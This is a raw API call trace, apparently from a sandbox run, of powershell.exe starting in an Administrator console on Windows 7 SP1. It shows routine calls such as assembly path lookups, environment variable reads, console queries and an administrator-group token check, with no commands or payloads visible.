	[0528.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0528.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0529.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0529.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0533.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0533.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0534.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0534.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0536.867] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0536.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.867] CoTaskMemFree (pv=0x49d030) 
	[0536.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0539.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x28dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0539.058] SetErrorMode (uMode=0x1) returned 0x1
	[0539.058] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x28dd40 | out: lpFileInformation=0x28dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0539.058] SetErrorMode (uMode=0x1) returned 0x1
	[0543.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0543.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0543.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0543.898] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0543.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.898] CoTaskMemFree (pv=0x49d030) 
	[0543.901] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0543.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.901] CoTaskMemFree (pv=0x49d030) 
	[0543.901] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0543.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.901] CoTaskMemFree (pv=0x49d030) 
	[0543.904] CoCreateGuid (in: pguid=0x28e108 | out: pguid=0x28e108*(Data1=0xad84cbe6, Data2=0x8b2b, Data3=0x4169, Data4=([0]=0x95, [1]=0x47, [2]=0x54, [3]=0x15, [4]=0x9b, [5]=0xcc, [6]=0x56, [7]=0x47))) returned 0x0
	[0543.907] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0543.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.907] CoTaskMemFree (pv=0x49d030) 
	[0543.910] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0543.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.910] CoTaskMemFree (pv=0x49d030) 
	[0543.991] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0543.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.991] CoTaskMemFree (pv=0x49d030) 
	[0543.999] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0544.000] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x28ddb0 | out: lpConsoleScreenBufferInfo=0x28ddb0) returned 1
	[0544.007] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0545.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x28ddb0 | out: lpConsoleScreenBufferInfo=0x28ddb0) returned 1
	[0545.069] GetVersionExW (in: lpVersionInformation=0x28dd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0545.071] GetCurrentProcess () returned 0xffffffffffffffff
	[0545.072] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x28ddd8 | out: TokenHandle=0x28ddd8*=0x328) returned 1
	[0545.076] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28dcf8 | out: TokenInformation=0x0, ReturnLength=0x28dcf8) returned 0
	[0545.077] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e7360
	[0545.077] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x3e7360, TokenInformationLength=0x4, ReturnLength=0x28dcf8 | out: TokenInformation=0x3e7360, ReturnLength=0x28dcf8) returned 1
	[0545.079] DuplicateTokenEx (in: hExistingToken=0x328, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x28de58 | out: phNewToken=0x28de58*=0x2ec) returned 1
	[0545.079] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28dcf8 | out: TokenInformation=0x0, ReturnLength=0x28dcf8) returned 0
	[0545.079] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e7310
	[0545.079] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x3e7310, TokenInformationLength=0x4, ReturnLength=0x28dcf8 | out: TokenInformation=0x3e7310, ReturnLength=0x28dcf8) returned 1
	[0545.080] CheckTokenMembership (in: TokenHandle=0x2ec, SidToCheck=0x2e34bc0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x28de68 | out: IsMember=0x28de68) returned 1
	[0545.080] CloseHandle (hObject=0x2ec) returned 1
	[0545.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.056] CoTaskMemAlloc (cb=0x804) returned 0x1b8e8e10
	[0546.056] GetConsoleTitleW (in: lpConsoleTitle=0x1b8e8e10, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0546.057] CoTaskMemFree (pv=0x1b8e8e10) 
	[0546.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.725] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0548.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.725] CoTaskMemFree (pv=0x49d030) 
	[0548.738] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0548.740] CoCreateGuid (in: pguid=0x28df50 | out: pguid=0x28df50*(Data1=0x2d1878e8, Data2=0x1edc, Data3=0x4394, Data4=([0]=0x82, [1]=0x28, [2]=0x31, [3]=0x3b, [4]=0x54, [5]=0x35, [6]=0xba, [7]=0x8))) returned 0x0
	[0548.741] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0548.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.742] CoTaskMemFree (pv=0x49d030) 
	[0549.796] WinSqmIsOptedIn () returned 0x0
	[0549.796] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.796] CoTaskMemFree (pv=0x49d030) 
	[0549.797] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.797] CoTaskMemFree (pv=0x49d030) 
	[0549.797] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.797] CoTaskMemFree (pv=0x49d030) 
	[0549.798] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.798] CoTaskMemFree (pv=0x49d030) 
	[0549.799] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.799] CoTaskMemFree (pv=0x49d030) 
	[0549.800] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.800] CoTaskMemFree (pv=0x49d030) 
	[0549.800] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.800] CoTaskMemFree (pv=0x49d030) 
	[0549.801] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.801] CoTaskMemFree (pv=0x49d030) 
	[0549.810] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.810] CoTaskMemFree (pv=0x49d030) 
	[0549.826] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.826] CoTaskMemFree (pv=0x49d030) 
	[0549.826] CoTaskMemAlloc (cb=0x104) returned 0x49d030
